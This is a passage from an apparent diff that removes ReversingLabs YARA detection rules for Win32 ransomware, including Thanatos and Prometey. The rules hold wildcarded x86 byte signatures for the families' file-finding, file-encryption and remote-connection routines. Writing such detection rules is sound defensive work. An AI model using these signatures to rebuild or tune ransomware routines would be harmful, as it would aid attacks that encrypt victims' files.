-            E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
-            B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
-            58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ??
-            ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ??
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85
-            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D
-        }
-		$encrypt_files_p2 = {
-            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ??
-            ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4
-            ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ??
-            50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D
-            ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Thanatos : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Thanatos ransomware."
-		author = "ReversingLabs"
-		id = "190adbd0-30a7-5619-ab70-3ab031ece2f7"
-		date = "2020-11-13"
-		modified = "2020-11-13"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Thanatos.yara#L1-L85"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a51fa9cf1a08e4cd252a8b385be3bfde909585e2a799baaede977e40ecff5313"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Thanatos"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 50 89 85
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? EB ?? 8D 49 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? C6 03 ?? FF
-            15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ??
-            ?? ?? F7 F9 52 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 4F 75 ?? 8B 95 ?? ?? ??
-            ?? 52 8D 85 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF D6 F6 85 ?? ?? ?? ?? ??
-            74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D7 85 C0 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2
-            50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D BD
-            ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B F8 72 ?? 8B
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 74 ?? 53 8D 9D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ??
-            ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 6A ?? 53 8B F0 53 8D 45 ?? 33 FF 50
-            89 7D ?? 89 5D ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55
-            ?? 8D 4D ?? 51 53 53 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
-            C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 53 2B C2 50 8B 45 ?? 56 50 FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8D 4D ?? 51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 50 8D 4D ?? 51 53 53 6A ?? 53 8B
-            1D ?? ?? ?? ?? 52 89 45 ?? FF D3 85 C0 74 ?? 8B 45 ?? 8B 3D ?? ?? ?? ?? 50 6A ?? FF
-            D7 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 8B 55 ?? 8B 02 51 50 56 E8 ?? ??
-            ?? ?? 8B 4D ?? 8B 45 ?? 83 C4 ?? 51 8D 55 ?? 52 56 6A ?? 6A ?? 6A ?? 50 FF D3 85 C0
-            74 ?? 8B 5D ?? 8B 0B 51 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 89 10 89
-            33 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 DB 8B 55 ?? 52 FF
-            15 ?? ?? ?? ?? 8B 45 ?? 53 50 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 F6 56 68 ?? ?? ?? ??
-            6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B F0
-            56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 56 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 50 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 8D B5 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B
-            00 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 B5 ?? ?? ?? ??
-            72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B 95 ?? ?? ?? ?? 6A ?? 8D
-            8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 52 51 50 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C2
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
-}
-rule REVERSINGLABS_Win32_Ransomware_Prometey : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Prometey ransomware."
-		author = "ReversingLabs"
-		id = "a5902fc6-2752-520f-be84-df9ea7b1e27d"
-		date = "2021-06-07"
-		modified = "2021-06-07"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Prometey.yara#L1-L156"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f14c9605e2d375176b461fd396be66754b0ace7dcaada8ca33ad86f6eda10b73"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Prometey"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$remote_connection_p1 = {
-            55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3
-            ?? ?? ?? ?? 6A ?? 5E 8D 85 ?? ?? ?? ?? 89 75 ?? 50 BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
-            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B 8D 4D ?? 88 5D ?? E8 ?? ??
-            ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03
-            C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 39 9D ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 33 DB 53 53 53 53 50 88 5D
-        }
-		$remote_connection_p2 = {
-            FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 53 56 53 53 6A ?? 68 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B D8 85 DB 74 ?? 6A ?? 68 ?? ?? ?? ??
-            33 C0 50 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ??
-            33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 53 FF D7 FF 75 ?? FF D7 80 7D ?? ?? 74 ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D
-            ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81 C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ?? 8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? E8
-        }
-		$find_files_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ??
-            ?? BA ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D 4D ?? 8B D3 C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
-            51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ??
-            ?? 33 C0 8D 7D ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ??
-            ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A
-            ?? 8B 7A ?? 2B CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B
-            12 57 52 51 8B CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D
-            ?? 51 50 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 7D
-            ?? 8B 9D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 0F 43 7D ?? 89 8D ??
-            ?? ?? ?? 3B D8 77 ?? 85 DB 75 ?? 8B F3 EB ?? 0F BE 09 2B C3 40 89 8D ?? ?? ?? ?? 03
-        }
-		$find_files_p2 = {
-            C7 89 85 ?? ?? ?? ?? 2B C7 50 51 57 EB ?? 53 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 46 2B C6 50 FF B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            8B F0 83 C4 ?? 85 F6 75 ?? 83 CE ?? 33 DB 56 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 45 ?? 89 5D ?? 50 8D 4D ?? 89 5D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 7D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 7D ?? 85 D2 74 ??
-            83 C9 ?? 8D 42 ?? 3B C1 0F 42 C8 03 CF EB ?? 2B F7 EB ?? 3B CF 74 ?? 49 80 39 ?? 75
-            ?? 2B CF EB ?? 83 C9 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 79 ?? 89 5D ?? C7 45 ?? ?? ??
-            ?? ?? 88 5D ?? 3B D7 0F 82 ?? ?? ?? ?? 2B D7 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83
-            7D ?? ?? 51 0F 43 45 ?? 8D 4D ?? 03 C7 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC
-            8D 45 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B 78 ?? 03 38 3B FB 7D ?? 81 FE ?? ?? ?? ?? 76 ?? 8D
-        }
-		$find_files_p3 = {
-            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B FB 7D ?? 81 FE ?? ?? ?? ??
-            76 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D
-            ?? 8D 04 41 50 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? C6 45
-            ?? ?? 56 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ??
-            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? C6 45 ?? ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
-            ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 51 50 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 56 BA ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85
-        }
-		$find_files_p4 = {
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45
-            ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8
-            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 9D ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ??
-            ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ?? ?? 03 F3 59 3B F7 75
-            ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ?? ?? 03 F3 3B F7 75 ??
-            8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ?? 59 59 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files = {
-            8B FF 55 8B EC 57 FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B F8 8B 49 ?? 90 F6 C1 ?? 75
-            ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? E9
-            ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 90 C1 E8 ?? A8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
